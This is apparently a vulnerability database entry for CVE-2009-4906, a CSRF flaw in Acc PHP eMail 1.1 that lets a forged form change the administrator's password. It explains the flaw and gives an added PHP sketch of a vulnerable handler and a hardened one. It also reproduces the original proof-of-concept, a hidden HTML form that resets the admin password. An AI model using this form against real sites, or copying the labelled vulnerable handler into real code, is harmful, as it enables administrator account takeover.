Acc PHP eMail 'index.php' Cross-Site Request Forgery Vulnerability

Vulnerability ID 1118761 Type Cross-Site Request Forgery
Published 2009-12-13 Updated 2010-06-25
CVE ID CVE-2009-4906 CNNVD ID CNNVD-201006-409
Platform PHP CVSS score 6.8
|Sources
https://www.exploit-db.com/exploits/10412
https://www.securityfocus.com/bid/79112
https://cxsecurity.com/issue/WLB-2010060199
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-409
|Details
Acc PHP eMail is an e-mail subscription and mailing-list management script. index.php in Acc PHP eMail 1.1 performs the password-change action (action=change1, with id, user, password and password1 fields) on any POST that arrives with a valid administrator session; there is no anti-CSRF token and no origin check. A remote attacker who gets a logged-in administrator to open a page hosting a hidden form (as in the PoC below) therefore has the browser submit the request with the administrator's session cookie and can set the administrator's password to a value of the attacker's choosing. Note that the PoC form sends the action field twice; PHP's $_POST keeps the last occurrence of a duplicate name, so the script receives action=change1.
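As an added example, not code from Acc PHP eMail or from the exploit author: a PHP password-change handler in the shape the PoC form targets, shown first in the vulnerable form the advisory describes (a session cookie is the only check, and the target row comes from the client-supplied id) and then hardened with a per-session synchronizer token, an Origin/Referer host check, re-authentication with the current password, a SameSite session cookie and session rotation. All function names, the users table, the current_password field, the SQLite file and the host name are assumptions.

```php
<?php
// Added example, not Acc PHP eMail's own code. It sketches a password-change
// handler with the same field names the PoC form posts (action, id, user,
// password, password1), first in the vulnerable shape and then hardened.
// Function names, the users table and the expected host are assumptions.
declare(strict_types=1);

// Lax SameSite keeps the session cookie off cross-site POSTs (PHP >= 7.3).
session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// Vulnerable shape: a valid admin session is the only check, so any page the
// administrator visits can POST this form and the browser attaches the cookie.
// The target row is chosen by the attacker-supplied `id`, as in the PoC.
function change_password_vulnerable(array $post, PDO $db): bool
{
    if (!isset($_SESSION['admin_id']) || ($post['action'] ?? '') !== 'change1') {
        return false;
    }
    if (!isset($post['password'], $post['password1']) || $post['password'] !== $post['password1']) {
        return false;
    }
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE id = ?');
    return $stmt->execute([password_hash($post['password'], PASSWORD_DEFAULT), (int) $post['id']]);
}

// Synchronizer token: generated once per session, embedded in the real form,
// compared in constant time. A cross-site form cannot read it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to emit inside the legitimate change-password form.
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// Origin/Referer host check as defence in depth: browsers set Origin on
// cross-site form POSTs and a page cannot forge it. Compare the parsed host,
// not a string prefix, so "example.com.evil.net" does not pass.
function same_origin(array $server, string $expected_host): bool
{
    $hdr = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    $host = $hdr === '' ? null : parse_url($hdr, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expected_host) === 0;
}

function change_password_hardened(array $post, array $server, PDO $db, string $expected_host): bool
{
    if (!isset($_SESSION['admin_id']) || ($post['action'] ?? '') !== 'change1') {
        return false;
    }
    $token = $post['csrf_token'] ?? '';
    if (!is_string($token) || !hash_equals(csrf_token(), $token)) {
        return false; // forged or missing token: exactly what the PoC form lacks
    }
    if (!same_origin($server, $expected_host)) {
        return false;
    }
    // Re-authenticate: a credential change requires the current password, so a
    // ridden or stolen session alone cannot lock the administrator out.
    $stmt = $db->prepare('SELECT password FROM users WHERE id = ?');
    $stmt->execute([$_SESSION['admin_id']]);
    $hash = $stmt->fetchColumn();
    if (!is_string($hash) || !password_verify((string) ($post['current_password'] ?? ''), $hash)) {
        return false;
    }
    $new = (string) ($post['password'] ?? '');
    if ($new === '' || $new !== ($post['password1'] ?? null)) {
        return false;
    }
    // Act on the session's own account, never on a client-chosen id.
    $stmt = $db->prepare('UPDATE users SET password = ? WHERE id = ?');
    $ok = $stmt->execute([password_hash($new, PASSWORD_DEFAULT), $_SESSION['admin_id']]);
    if ($ok) {
        session_regenerate_id(true); // rotate the session after a credential change
    }
    return $ok;
}

// Dispatch in the style index.php routes on `action`. With the PoC's duplicated
// action field, $_POST['action'] is the last value, "change1".
if ($_SERVER['REQUEST_METHOD'] === 'POST' && ($_POST['action'] ?? '') === 'change1') {
    $db = new PDO('sqlite:mailinglist.db'); // assumed storage
    $ok = change_password_hardened($_POST, $_SERVER, $db, 'mailinglist.example.com');
    http_response_code($ok ? 200 : 403);
}
```

The token check alone closes the CSRF: the hidden form in the PoC can set every field it knows about, but it cannot read csrf_token out of the administrator's session, and the SameSite cookie attribute stops the browser from attaching the session cookie to that cross-site POST in the first place. The current-password check and the use of the session's own admin_id instead of the posted id are independent hardening that also defeat the id=1 / user=admin targeting the PoC relies on.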
|Exploit
                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/

                 01000010 01101001 01001111

[#]----------------------------------------------------------------[#]
#
# [+] Acc PHP eMail v1.1 - [ CSRF ]
#
#  // Author Info
# [x] Author: bi0
# [x] Contact: bukibv@hotmail.com
# [x] Homepage : www.ssteam.ws
# [x] Thanks: packetdeath, Zer0flag, redking and ssteam.ws ...
#
[#]-------------------------------------------------------------------------------------------[#]
#
# [x] Exploit :
#
# [ CSRF ]
#
#  It Changes the password
#
#  http://localhost/mailinglist/index.php
#
# // Start CSRF
# <html>
# <form action="http://localhost/mailinglist/demo/index.php" method="POST">
# <input type="hidden" name="action" value="change">
# <input type="hidden" name="id" value="1">
# <input type="hidden" id="text" name="user" value="admin">
# <input type="password"  name="password" value="pass">
# <input type="password"  name="password1" value="pass">
# <input type="hidden" name="action" value="change1">
# <input type="submit" name="login" value="Modify">
# </form>
# </html>
# // End of attack
#
[#]------------------------------------------------------------------------------------------[#]

#EOF
|Affected products
Accscripts Acc Php Email 1.1
|References

Source: VUPEN
Name: ADV-2009-3508
Link: http://www.vupen.com/english/advisories/2009/3508
Source: EXPLOIT-DB
Name: 10412
Link: http://www.exploit-db.com/exploits/10412
Source: SECUNIA
Name: 37666
Link: http://secunia.com/advisories/37666
Source: MISC
Link: http://packetstormsecurity.org/0912-exploits/ape-xsrf.txt